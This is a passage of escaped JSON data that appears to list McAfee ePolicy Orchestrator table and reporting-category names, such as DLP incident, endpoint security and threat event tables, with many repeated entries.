Key\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents \\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"vminfoVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"OpenStack Cloud (Generic) system properties\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents History\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Rules\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Active Response Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Remediation Event Table\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Properties\\\",\\r\\n\\t\\t\\t\\\"workloadalerts.table.name\\\",\\r\\n\\t\\t\\t\\\"vmInfokubernetes.table.name\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Repositories\\\",\\r\\n\\t\\t\\t\\\"Manual Registration 
Documents\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Properties\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Systems\\\",\\r\\n\\t\\t\\t\\\"Firewall Rule\\\",\\r\\n\\t\\t\\t\\\"Security Incidents\\\",\\r\\n\\t\\t\\t\\\"Web Control Events\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Systems\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedTargetsView\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Systems\\\",\\r\\n\\t\\t\\t\\\"DLP Case Management\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"VMware System Properties\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Scan Information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Properties\\\",\\r\\n\\t\\t\\t\\\"Agent Handlers\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Rolled-Up Events\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Systems\\\",\\r\\n\\t\\t\\t\\\"Registered Servers\\\",\\r\\n\\t\\t\\t\\\"Subtask Log Entries\\\",\\r\\n\\t\\t\\t\\\"discovery_file_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Firewall Client Rule 
Executables\\\",\\r\\n\\t\\t\\t\\\"workloaddetail_1.table.name\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Registered Cloud Account\\\",\\r\\n\\t\\t\\t\\\"Cloud system vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"RelayServer and SuperAgent Statistics Entries\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Endpoint Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Compliance History\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedSourcesView\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"discovery_classification_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Products Property\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"workloadDetailAwsAzure.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion 
Incidents \\\",\\r\\n\\t\\t\\t\\\"Client Task Assignment Broken Inheritance\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents \\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Policies\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"Cloud system properties\\\",\\r\\n\\t\\t\\t\\\"Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.LocalNetwork\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Managed Systems\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Properties\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"System Health Indicator\\\",\\r\\n\\t\\t\\t\\\"Data at Rest (Endpoint) Incidents Rollup\\\",\\r\\n\\t\\t\\t\\\"Active Response Custom Events\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventResolution_Rollup\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"tagIssueCount.table.name\\\",\\r\\n\\t\\t\\t\\\"Client Events\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Properties\\\",\\r\\n\\t\\t\\t\\\"sassettingstatus.table.name\\\",\\r\\n\\t\\t\\t\\\"Capture search list\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents History\\\",\\r\\n\\t\\t\\t\\\"groupproperty.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Client interface logon audit log\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"mginf.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Discover 
Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.RemoteNetwork\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Issues\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange Server Properties\\\",\\r\\n\\t\\t\\t\\\"vmproperty.table.name\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"DLP Monitor Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Rolled-Up Threat Events\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Systems Per Product\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"epoTagVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Client Events\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Systems\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Azure Discovery Properties\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignmentVendortag.table.name\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_name\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Tag Groups\\\",\\r\\n\\t\\t\\t\\\"DLP Case Endpoint Discovery Incidents 
(Hidden)\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Properties\\\",\\r\\n\\t\\t\\t\\\"Server Keys\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"vmInfoawsazure.table.name\\\",\\r\\n\\t\\t\\t\\\"vminfoDetail.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Task Log Messages\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_name\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Tag Type\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents Rollup\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Monitor Properties\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Microsoft Azure System Properties.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Status Events\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Application\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Custom Events\\\",\\r\\n\\t\\t\\t\\\"IP address List\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume 
Properties \\\",\\r\\n\\t\\t\\t\\\"Exploit Prevention Events\\\",\\r\\n\\t\\t\\t\\\"Agent Enforcement Status\\\",\\r\\n\\t\\t\\t\\\"vminfo1.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR System\\\",\\r\\n\\t\\t\\t\\\"Event Product\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"DLP Prevent Properties\\\",\\r\\n\\t\\t\\t\\\"issueDetailCount.table.name\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXLBroker Properties \\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"epoevents4.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Capture Results\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"accountdetails.table.name\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"LDAP Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Audit Log Entries\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management\\\",\\r\\n\\t\\t\\t\\\"Usage Metering Report\\\",\\r\\n\\t\\t\\t\\\"Application\\\",\\r\\n\\t\\t\\t\\\"ePOComputerProperties.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Agent Properties\\\",\\r\\n\\t\\t\\t\\\"epoevents.table.name\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"DLP 
Prevent Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Product Status\\\",\\r\\n\\t\\t\\t\\\"Roles and Permissions\\\",\\r\\n\\t\\t\\t\\\"gridthreatlist.table.name\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"DXL Broker Systems\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"Agent Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Applied Client Tasks\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"DXL Client Systems\\\",\\r\\n\\t\\t\\t\\\"Active Response Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"Hyper-V System Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Properties\\\",\\r\\n\\t\\t\\t\\\"eventlist4.table.name\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume vendor-specific properties\\\",\\r\\n\\t\\t\\t\\\"DLP Server Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Threat Events\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Endpoint Systems\\\",\\r\\n\\t\\t\\t\\\"Client Interface Locked Machines\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Host Cache Item Table\\\",\\r\\n\\t\\t\\t\\\"Cache Info Table\\\",\\r\\n\\t\\t\\t\\\"Device 
Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Rolled-Up Systems\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"workloaddetailKubernetes.table.name\\\",\\r\\n\\t\\t\\t\\\"Subtask Log Messages\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfovcenter.table.name\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Compliance History\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Properties\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Kubernetes Service System Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"account.table.name\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"DLP Case Management\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Scan Info\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents 
History\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Scan Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Servers\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary 
Report\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"DLP User Session Rules\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents \\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents \\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Network discovery action information 
\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Policies\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents History\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Email - Matched 